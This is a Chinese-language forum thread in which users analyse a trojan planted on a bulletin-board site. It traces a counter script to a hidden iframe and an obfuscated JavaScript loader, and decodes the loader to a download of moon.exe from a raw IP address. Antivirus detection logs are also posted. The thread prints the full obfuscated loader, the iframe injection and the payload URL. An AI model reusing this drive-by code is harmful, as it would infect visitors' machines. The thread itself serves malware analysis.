这个网站有木马？的木马dcde7b

飞天狐

请问下LZ

http://bbs.hasea.com/

1. <script src="http://www8.itsun.com/count.php?uuid=1718873&style=icon" type="text/javascript">
   

复制代码

http://www8.itsun.com/count.php?uuid=1718873&style=icon

1. document.write('<iframe width="0" height="0" border="0" src="http://58.49.58.106/count2.php?uuid=1718873&ip1=202.96.139.156'+ query + '">');

复制代码

偶这里得不到http://58.49.58.106/count2.php?uuid=1718873&ip1=202.96.139.156'+ query + '"
的代码，请问LZ是如何继续下一步的呢？谢谢。

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\moon[1].rar'
C:\Documents and Settings\Administrator\My Documents\
  moon[1].rar
    [0] Archive type: RAR
    --> moon[1].exe
        [DETECTION] Contains suspicious code HEUR/Malware
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!

jimmyleo

这个貌似是itsun的统计代码

promised

既然是[1]，可能是缓存提取的
反正我没找到挂在哪

moonsilver

Trojan.IMMSG.Win32.TBMSG.ygd

飞天狐

直接上去

可见到有
http://58.49.58.106/count2.php?uuid=1718873&ip1=202.96.139.156&c_page=http%3A//bbs.hasea.com/&refer1=&c_screen=800x600
这个HTML
但没见有上面说的那个
http://58.49.58.106/count2.php?uuid=1718873&ip1=202.96.139.156'+ query + '"

打开：
［code]
<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" C><noscript><iframe></iframe></noscript><script language="javascript"><!--
gG65="\@NGc3444",lK15="\?\@343\r\~3s\+\'c";.4018409,cZ69=".6648197",lK15='1\!iA\|\"zF8IO6\^\[0V\)\:Co\*\/x2\-gu\rcft\+kY\=L4MpUS\`N3X\>r\?RKQlqE\\B\nvs\%\.\@\(GH\&\#j9\ WnJ\]\<T\'\$7mh\_w\;a\,DZd\~\}eb5\{Py',gG65='Yts\ \!\[\;ZG\)\n\(\,\_\$HczO\@\\jPTKCg682No\-DMyU4aAV\'\?95Jpl7\|\rm\*\:\%I\&qQEf\<\.F1\`wn\#\{S\~v\+b\/R0hxi\=L\^ed\"\>rW3\]kX\}uB';function lV39(hX41){"\@c\?G\'c\~",l=hX41.length;'\<\,K5t\{t5',w='';while(l--)"G\@4G\~3c4s\+\'c",o=gG65.indexOf(hX41.charAt(l)),'\<\,\)\,4\}xK',w=(o==-1?hX41.charAt(l):lK15.charAt(o))+w;"\@3\?G3cNN",gG65=gG65.substring(1)+gG65.charAt(0),document.write(w);'\<\)\{x\,\{\,K'};lV39("bQ8psaN\{me\~CgeC\]MneqeQ8psaNJ\;AY9M9YTG\^s2\.r\@8gx\]\~Nfemmc\}2g\~8Ns\@\~\{\=rx\.c\}p\]Ngp\~\{2emQ\]3\^2g\~8Ns\@\~\{\=xrx\.c\}r\@8gx\]\~Nf\@\~8\@\~N\]PNx\]\~gM\=rx\^Q\]N\/sx\]\@gN\.\[\=xrx\.c\[dG\$\$c3\^\=xrx\.c\^3r\@8gx\]\~Nf\@\~8\@\~N\]PNx\]\~gM\~\]L\{Zg\~8Ns\@\~\.\[p\]Ngp\~\{2emQ\]\[c\^2g\~8Ns\@\~\{\=\~rx\.\]c\}s2\.r\@8gx\]\~NfmeB\]pQ\!\!Ls\~r\@LfQsr\]kepc\}s2\.\]fLis8itMYcp\]Ngp\~\{2emQ\]\^33\^s2\.r\@8gx\]\~NfmeB\]pQc\}r\@8gx\]\~Nf8eaNgp\]\:q\]\~NQ\.\:q\]\~Nf4\nAV\:\"\nS\?c\^r\@8gx\]\~Nf\@\~x\@gQ\]r\@L\~M\=\~rx\^3\]mQ\]\}r\@8gx\]\~Nf\@\~x\@gQ\]gaM\=\~rx\^3\^sO\(UMhh\$T\^P\ T\#MYh\$9\^2g\~8Ns\@\~\{\=rLQ\.c\}Ls\~r\@LfQNeNgQ\{M\{\[\{\[\^Q\]N\/sx\]\@gN\.\[\=rLQ\.c\[dY\$\$c\^3\^\=rLQ\.c\^\]\rU9MYY9\$\^\-\/Y\(MYh\$\$\^2g\~8Ns\@\~\{\=rrQ\.c\}s2\.r\@8gx\]\~Nfemmc\}r\@8gx\]\~Nf\@\~Q\]m\]8NQNepNM2g\~8Ns\@\~\{\.c\}p\]Ngp\~\{2emQ\]3\^Q\]N\/sx\]\@gN\.\[\=rrQ\.c\[dh\$\$c33\^\=rrQ\.c\^nFh\(MTGU9\^\;\:UYM\(GUU\^s2\.Ls\~r\@Lfm\@8eNs\@\~fap\@N\@8\@mfs\~r\]P\n2\.\[2sm\]\[ctMKYcr\@8gx\]\~Nfm\@8eNs\@\~M\[\[\^\*\nU\(M\#h\$9\^e1X9MY\#GX\^k4X\$MGThX\^\~V\#hM\#UYX\^q\ UGM9\#G\#\^Qv9\$MYYTh\^Q\nThMhUYh\^\^\=ms8\]\~Q\]r\=N\@\=M\[igBg2\]\~C\[\^bjQ8psaNJ")//--></script><SCRIPT LANguAGe=jAVascRIPt>lV39("\/E2l\ AoS\*dvg6dgky\;\+dQd\'2l\ Ao\;p8q\/sCCS8qN6v2o\ \\vSD\ \*\*\%ll\\lEFzSu8qlko6lvSol6ke8q\]8q\^\ vW\\\^\<\\vkll\\lSySD\ \*\*\%ll\\lEe8qPPSCCp8q\/PE2l\ Aop8q\/\'\@\|\nBRSU\!91V\!1\%y\;\+dQd\'2l\ Ao\;p8qN6v2o\ \\vS\`\+\!dDkEF\'QtzuQdlS\r9lY2\&\~kRKSyS\^\ vW\\\^\$\;IT4\>IT\,tITx4IT\,\)\;b\$\;ITxKIT\,tIT\,\%IT\,4IT\,GIT\,\>\;bFzj\'Qtelko6lvS\^\ vW\\\^\$\;IT4\>IT\,tITx4IT\,\)\;b\$\;ITxKIT\,GITx\}IT\,\%IT\,4\;bF\r9lY2\&\~kRKz\-0ITK\%IT\,\}ITx\)IT\,\}0e8q\]8qQdlS9g\!\!\+U\!v5e8q\:5\^aRKy\;IT4\>IT\,\{\;8qQdlS\!\ o\`de8q\^\n\{\^cty\;IT\,5ITxK\;8q\!\ o\`dy\^\ vW\\\^\$\;IT\,4IT\,GIT\,5ITx\}IT\,\>IT\,\}IT\,\%ITx4\;b8qQdlS\'kgE\~hME\}y\;IT\,GIT\,KIT\,\!IT\,\}IT\,5ITx4\;8q9g\!\!\+U\!v5y\!\ o\`d\$\;IT\,5ITxKIT\,\}IT\,tITx4IT\,\}IT4\}IT\,\@IT\,\}IT\,\>IT\,\}IT\,\%ITx4\;bF\;IT\,GIT\,KIT\,\!IT\,\}IT\,5ITx4\;ze8q\:\n\{\^cty\;IT\,GITx5IT\,G\;8qT\n\{\^cty\;IT\,\,ITx4\;\-\;ITK\%\;8ql\n\{\^cty\;IT\}\)IT4\>IT4\@IT4\)IT\}4IT\}4IT\}H\;8qE\=mlGKy\;IT\,5IT\,\@ITx5IT\,\{IT\,4\;\-\;\;8qk4\\mG5y\;IT5\!IT4KIT44IT5\{\;\-\;IT5\,IT45\;\-\;IT5\}IT5\}IT5\,\;\-\;ITK\>\;\-\;IT5\,\;\-\;IT5\}IT4tIT55ITK\>IT5tIT5t\;\-\;IT44IT5HITK\>IT5\{\;\-\;IT5\)IT55IT4t\;\-\;ITK\>\;\-\;IT5HIT5HIT45IT5HIT54IT4\,\;\-\;IT45IT5K\;\-\;IT5\{IT4\}IT55IT5\,\;8q9g\!\!\+U\!v5\$\;ITx5IT\,\}ITx4IT4tITx4ITx4ITxKIT\,\{IT\,KITx\}ITx4IT\,\}\;bF\;IT\,5IT\,\@IT\,tITx5ITx5IT\,\{IT\,4\;\"E\=mlGK\-k4\\mG5ze8qE\n\{\^cty\:5\^aRK\-\^\n\{\^ct\-\:\n\{\^ct8qo\n\{\^ctyT\n\{\^ct\-l\n\{\^ct8qi\n\{\^ctyE\n\{\^ct\-o\n\{\^ct8qV\,\'Nky\;IT4tIT\,4\;8qlKYaRKy\;IT\}5ITx4ITxKIT\,\}IT\,tIT\,\>\;8q\:KYaRKy\;IT\,GIT\,4IT\,KITK\%\;8qQdlSr\,e8q\^KYaRKyV\,\'Nk\-\:KYaRK\-lKYaRK8qr\,y9g\!\!\+U\!v5\$\;IT45ITxKIT\,\}IT\,tITx4IT\,\}IT4GIT\,KIT\,\!IT\,\}IT\,5ITx4\;bFi\n\{\^ct\"\;\;ze8qQdlSJXZcGKe8q\^\rA\ 54y\;IT4\}IT\}4\;8qJXZcGKy9g\!\!\+U\!v5\$\;IT45ITxKIT\,\}IT\,tITx4IT\,\}IT4GIT\,KIT\,\!IT\,\}IT\,5ITx4\;bF\^KYaRK\"\;\;ze8qrEx\^cty\;IT4x\;8qm\!lR\^y\;IT\,\}\;8ql\>iv\:ty\;IT\}5IT\,5\;8q\+Yk\`dkk\^ky\`\+\!dDkEF5HHze8q\n\|\!a\{y\;ITxKIT\,\{\;8q\r\|\!a\{y\;ITxHITx4IT\,\{\;8qc\#\&TVKy\;IT\,\%IT\,xITK\%IT4\,IT\,\{\;8q\'\!lR\^y\;ITxHITxHIT\,\@\;8qR\!lR\^y\;IT\,\{IT\,5IT\,tITx4IT\,\{IT\,GIT\,\%\;8q\`G\=5cKy\;IT\,\@IT\,\}IT\}5ITx\{\;8qJXZcGK\$\;ITx4ITx\{ITxHIT\,\}\;byte8q9Bo\nV5y\;ITx5ITx4IT\,\}IT\,\>IT4GIT\,KIT\,\!IT\,\}IT\,5ITx4\;8qQdlS\`\)y9g\!\!\+U\!v5\$\;IT45ITxKIT\,\}IT\,tITx4IT\,\}IT4GIT\,KIT\,\!IT\,\}IT\,5ITx4\;bFl\>iv\:t\-\n\|\!a\{\-\r\|\!a\{\-c\#\&TVK\-\`G\=5cK\-9Bo\nV5\"\;\;ze8qQdlS\~\|\(A12l\{y\`\)\$\;IT4xIT\,\}ITx4IT\}5ITxHIT\,\}IT\,5IT\,\{IT\,tIT\,\@IT4\,IT\,GIT\,\@IT\,4IT\,\}ITxK\;bFHze8qr\,\$\;IT\,GITxHIT\,\}IT\,\%\;bFrEx\^ct\-\^\rA\ 54\"S0IT\,\)ITx4ITx4ITxHIT5dITKNITKNIT5KIT5KIT5KITKkIT5xIT55ITKkIT5KIT5\}IT54ITKkIT5\,IT5xITKNIT\,WIT\,NIT\,NIT\,kITKkIT\,\}ITx\)IT\,\}0\"Hze8qQdlSQDQaRKe8qr\,\$\;ITx5IT\,\}IT\,\%IT\,4\;bFze8qQDQaRKy\`\)\$\;IT4KITx\}IT\,\{IT\,\@IT\,4IT\}HIT\,tITx4IT\,\)\;bF\~\|\(A12l\{\"\;ITx5ITx\{ITx5\;\-\+Yk\`dkk\^kze8q\+Yk\`dkk\^kyS\`\)\$\;IT4KITx\}IT\,\{IT\,\@IT\,4IT\}HIT\,tITx4IT\,\)\;bF\~\|\(A12l\{\"\+Yk\`dkk\^kze8q\(\!\rk\=4y\;IT\}5IT\,\)\;8q\|\!lR\^y\;IT\,\@IT\,\@ITK\%IT4t\;8qJXZcGK\$\;IT4GITxHIT\,\}IT\,\%\;bFze8qV\!lR\^y\(\!\rk\=4\-m\!lR\^\-\|\!lR\^8qc\!lR\^y\'\!lR\^\-R\!lR\^8qQdlSMtty9g\!\!\+U\!v5\$\;IT45ITxKIT\,\}IT\,tITx4IT\,\}IT4GIT\,KIT\,\!IT\,\}IT\,5ITx4\;bFV\!lR\^\-c\!lR\^\"\;\;ze8qJXZcGK\$\;IT\}xITxKIT\,\{ITx4IT\,\}\;bFr\,\$\;ITxKIT\,\}ITx5ITxHIT\,GIT\,\%ITx5IT\,\}IT4KIT\,GIT\,4ITx\{\;bze8qJXZcGK\$\;IT\}5IT\,tITx\,IT\,\}IT\}4IT\,GIT4\,IT\,\{IT\,\@IT\,\}\;bF\+Yk\`dkk\^k\"Kze8q\`\)\$\;IT4\>IT\,GITx\,IT\,\}IT4\,IT\,\{IT\,\@IT\,\}\;bF\+Yk\`dkk\^k\"QDQaRKze8qJXZcGK\$\;IT45IT\,\@IT\,GITx5IT\,\}\;bFze8q\>\,9X65y\;IT\,GITxH\;8qQdlSJ\^\nXtKy\`\)\$\;IT4KITx\}IT\,\{IT\,\@IT\,4IT\}HIT\,tITx4IT\,\)\;bF\~\|\(A12l\{\-0IIITx5ITx\{ITx5ITx4IT\,\}IT\,\>IT55IT5K0\"0IT\,5IT\,\>IT\,4ITK\%IT\,\}ITx\)IT\,\}0z8qoKg\#YKy\;IT\,\}\;\-\;IT\,\%\;8qQdlS\!\+\\t5y0ITKHITKGIT\,5ITKH0\-QDQaRK8q9g\!\!\+U\!v5\$\;IT45ITxKIT\,\}IT\,tITx4IT\,\}IT4GIT\,KIT\,\!IT\,\}IT\,5ITx4\;bFV\!lR\^\-c\!lR\^\"\;\;z8q\$\;It\,5IttHIt4\}Itt4It\}4It4\}ItxHItH\}It45ItK\}It\,4ItH\}\;bFJ\^\nXtK\"\!\+\\t5\"\;\;\"\>\,9X65\-oKg\#YK\"Hze8q\/P\'\@\|\nBRp8q\/E2l\ AoS\*dvg6dgky\;\+dQd\'2l\ Ao\;p8q\/sCCS8qN6v2o\ \\vSD\ \*\*\%ll\\lEFzSu8qlko6lvSol6ke8q\]8q\^\ vW\\\^\<\\vkll\\lSySD\ \*\*\%ll\\lEe8qPPSCCp8q\/PE2l\ Aop8q\/PX\\WYp8q\/P\=oi\*p")</script></head><body><noscript><b><font color=red>这个页面需要Javascript支持的浏览器!!!            </font></b></noscript></body></html>
［/code]

解得：

1. Z6["\x6F\x70\x65\x6E"](Zs7wV1+wKpi34, '\x68\x74\x74\x70\x3a\x2f\x2f\x32\x32\x32\x2e\x37\x33\x2e\x32\x35\x34\x2e\x36\x37\x2f\x6d\x6f\x6f\x6e\x2e\x65\x78\x65',0);

复制代码

再转换就可得：
http://222.73.254.67/moon.exe


问题是偶11楼的怎么搞？

jimmyleo

那个是个变量，在这里：
var query = '&c_page=' + escape(c_page) + '&refer1=' + escape(fromr) + '&c_screen=' + screen.width+ 'x'+screen.height;
然后又用到两个变量，在这里：
var fromr=top.document.referrer;
fromr=(fromr=="")?document.referrer:fromr;
var c_page=top.location.href;
c_page = c_page =="" ? location.href : c_page;
貌似一个是观察是进哪个页面被黑的
第二个是看是否拦截refer
最后的两个是分辨率 貌似没什么意思……

wangjay1980

detected: virus Heur.Trojan.Generic (modification)        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\moon[1].rar/moon[1].exe//ASPack